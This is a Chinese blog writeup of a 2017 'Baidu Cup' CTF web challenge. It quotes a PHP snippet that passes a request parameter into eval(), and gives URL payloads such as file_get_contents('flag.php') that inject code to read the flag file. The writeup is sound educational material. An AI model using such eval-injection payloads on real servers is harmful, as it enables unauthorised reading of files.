“百度杯”CTF比赛 2017 二月场--web 爆破-2 writeup
2019-06-14 15:19
826 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43578492/article/details/91977158
题目描述
解题思路
点击链接得到以下代码:
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__);
- 尝试将hello变为全局变量(GOLBALS)
在URL后加?hello=$GOLBALS
结果:
得到FLAG
- 由第一步可知,flag不在变量中
猜测flag在文件中,使用file_get_contents() 函数,其作用为把整个文件读入一个字符串
中。
URL?hello=file_get_contents('flag.php')
右键源码得到flag
- 也可在URL后直接加
?hello=file('flag.php')
file() 函数把整个文件读入一个数组
中
相关文章推荐
- SWPU CTF 2017 Web WriteUp
- i春秋 百度杯 CTF比赛(二月场) Misc web题解 By Assassin
- i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
- NJCTF 2017 web Writeup
- “百度杯”CTF比赛(二月场)-web-writeup
- Tamevic’s Ctf-Web writeup@实验吧‘这个看起来有点简单!’
- volga-ctf-quals-2016 pwn web_of_scicen_250 writeup
- bugkuCTF Writeup (Web)22-25
- 实验吧CTF(Web)-writeup
- 百度杯CTF比赛二月第三场比赛(Reverse专题赛)之CrackMe-1
- CTF_论剑场 Web WriteUp(持续更新)
- CSTC-2017-Web-writeup
- BugkuCTF-web-login1(SKCTF) writeup
- 南邮ctf nctf CG-CTF web题writeup
- “百度杯”CTF比赛2017年2月场WP--web
- Xp0intCTF 2017 writeup
- Writeup_BugkuCTF_Web
- TWCTF 2016 (Tokyo Westerns CTF ) WEB WriteUp
- Nuit du Hack CTF Quals 2018 writeup (web)
- 百度杯CTF Write up集锦 WEB篇